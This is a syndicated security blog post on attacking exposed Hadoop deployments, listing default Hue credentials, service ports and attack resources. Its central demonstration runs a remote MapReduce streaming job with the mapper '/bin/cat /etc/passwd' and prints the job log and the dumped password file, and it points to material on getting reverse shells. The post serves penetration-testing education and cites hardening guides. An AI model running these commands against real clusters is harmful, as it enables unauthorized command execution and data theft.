DevOoops: Hadoop

What is Hadoop?

The Apache Hadoop software library is a framework that allows for the distributed processing of large data sets across clusters of computers using simple programming models. It is designed to scale up from single servers to thousands of machines, each offering local computation and storage. Rather than rely on hardware to deliver high-availability, the library itself is designed to detect and handle failures at the application layer, so delivering a highly-available service on top of a cluster of computers, each of which may be prone to failures.
from: http://hadoop.apache.org/

If you’ve ever heard of MapReduce…you’ve heard of Hadoop.

NFI what i’m talking a bout? Here is a 3minute video on it: https://www.youtube.com/watch?v=8wjvMyc01QY

What are common issues with MapReduce / Hadoop?

Hadoop injection points from Kaluzny zeronights talk:

Hue

Common defaults admin/admin, cloudera/cloudera



Although occasionally you’ll find one that will just let you pick your own 🙂

If you gain access, full HDFS access, run queries, etc

HDFS WebUI

HDFS exposes a web server which is capable of performing basic status monitoring and file browsing operations. By default this is exposed on port 50070 on the NameNode. Accessing http://namenode:50070/ with a web browser will return a page containing overview information about the health, capacity, and usage of the cluster (similar to the information returned by bin/hadoop dfsadmin -report).




From this interface, you can browse HDFS itself with a basic file-browser interface. Each DataNode exposes its file browser interface on port 50075.


update:The hadoop attack library is worth checking out.
https://github.com/wavestone-cdt/hadoop-attack-library

Most up-to-date presentation on hadoop attack library: https://www.slideshare.net/phdays/hadoop-76515903

There is a piece around RCE (https://github.com/CERT-W/hadoop-attack-library/tree/master/Tools%20Techniques%20and%20Procedures/Executing%20remote%20commands)

You’ll need info found in ip:50070/conf




TLDR; find the correct open Hadoop ports and run a map reduce job against the remote hadoop server. 

You need to be able to access the following Hadoop services through the network:
  • YARN ResourceManager: usually on ports 8030, 8031, 8032, 8033 or 8050
  • NameNode metadata service in order to browse the HDFS datalake: usually on port 8020
  • DataNode data transfer service in order to upload/download file: usually on port 50010



Let’s see it in action:

lookupfailed-2:hadoop CG$ hadoop jar /usr/local/Cellar/hadoop/2.7.3/libexec/share/hadoop/tools/lib/hadoop-streaming-2.7.3.jar -input /tmp/a.txt -output blah_blah -mapper “/bin/cat /etc/passwd” -reducer NONE

17/01/05 22:11:40 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform… using builtin-java classes where applicable
packageJobJar: [/var/folders/r8/6hjsj3h92wn82btldp7zlyb40000gn/T/hadoop-unjar5960812935334004257/] [] /var/folders/r8/6hjsj3h92wn82btldp7zlyb40000gn/T/streamjob4422445860444028358.jar tmpDir=null
17/01/05 22:11:41 INFO client.RMProxy: Connecting to ResourceManager at nope.members.linode.com/1.2.3.4:8032
17/01/05 22:11:41 INFO client.RMProxy: Connecting to ResourceManager at nope.members.linode.com/1.2.3.4:8032
17/01/05 22:11:43 INFO mapred.FileInputFormat: Total input paths to process : 1
17/01/05 22:11:43 INFO mapreduce.JobSubmitter: number of splits:2
17/01/05 22:11:44 INFO mapreduce.JobSubmitter: Submitting tokens for job: job_1483672290130_0001
17/01/05 22:11:45 INFO impl.YarnClientImpl: Submitted application application_1483672290130_0001
17/01/05 22:11:45 INFO mapreduce.Job: The url to track the job: http://nope.members.linode.com:8088/proxy/application_1483672290130_0001/
17/01/05 22:11:45 INFO mapreduce.Job: Running job: job_1483672290130_0001
17/01/05 22:12:00 INFO mapreduce.Job: Job job_1483672290130_0001 running in uber mode : false
17/01/05 22:12:00 INFO mapreduce.Job:  map 0% reduce 0%
17/01/05 22:12:10 INFO mapreduce.Job:  map 100% reduce 0%
17/01/05 22:12:11 INFO mapreduce.Job: Job job_1483672290130_0001 completed successfully
17/01/05 22:12:12 INFO mapreduce.Job: Counters: 30
File System Counters
FILE: Number of bytes read=0
FILE: Number of bytes written=240754
FILE: Number of read operations=0
FILE: Number of large read operations=0
FILE: Number of write operations=0
HDFS: Number of bytes read=222
HDFS: Number of bytes written=2982
HDFS: Number of read operations=10
HDFS: Number of large read operations=0
HDFS: Number of write operations=4
Job Counters 
Launched map tasks=2
Data-local map tasks=2
Total time spent by all maps in occupied slots (ms)=21171
Total time spent by all reduces in occupied slots (ms)=0
Total time spent by all map tasks (ms)=21171
Total vcore-milliseconds taken by all map tasks=21171
Total megabyte-milliseconds taken by all map tasks=21679104
Map-Reduce Framework
Map input records=1
Map output records=56
Input split bytes=204
Spilled Records=0
Failed Shuffles=0
Merged Map outputs=0
GC time elapsed (ms)=279
CPU time spent (ms)=1290
Physical memory (bytes) snapshot=209928192
Virtual memory (bytes) snapshot=3763986432
Total committed heap usage (bytes)=65142784
File Input Format Counters 
Bytes Read=18
File Output Format Counters 
Bytes Written=2982
17/01/05 22:12:12 INFO streaming.StreamJob: Output directory: blah_blah

lookupfailed-2:hadoop CG$ hadoop fs -ls blah_blah
17/01/05 22:12:22 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform… using builtin-java classes where applicable
Found 3 items
-rw-r–r–   3 root supergroup          0 2017-01-05 22:12 blah_blah/_SUCCESS
-rw-r–r–   3 root supergroup       1491 2017-01-05 22:12 blah_blah/part-00000
-rw-r–r–   3 root supergroup       1491 2017-01-05 22:12 blah_blah/part-00001
lookupfailed-2:hadoop CG$ hadoop fs -cat blah_blah/part-00001
17/01/05 22:12:49 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform… using builtin-java classes where applicable

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
hduser:x:1000:1000:,,,:/home/hduser:/bin/bash



http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf

Walks you thru how to get reverse shells or meterpreter shells (windows) if you can run commands.




Resources:
http://2015.zeronights.org/assets/files/03-Kaluzny.pdf

video of above talk from appsecEU 2015 https://www.youtube.com/watch?v=ClXKGI8AzTk
http://hackedexistence.com/downloads/Cloud_Security_in_Map_Reduce.pdf

https://media.blackhat.com/bh-us-10/presentations/Becherer/BlackHat-USA-2010-Becherer-Andrew-Hadoop-Security-slides.pdf 

https://securosis.com/assets/library/reports/Securing_Hadoop_Final_V2.pdf

https://github.com/CERT-W/hadoop-attack-library

https://www.sans.org/score/checklists/cloudera-security-hardening

http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf

http://www.cloudera.com/documentation/enterprise/latest/topics/cdh_ig_ports_cdh5.html


What did I miss?  Anything to add?

*** This is a Security Bloggers Network syndicated blog from Carnal0wnage & Attack Research Blog authored by CG. Read the original post at: http://carnal0wnage.attackresearch.com/2017/06/devooops-in-memory-databases-hadoop.html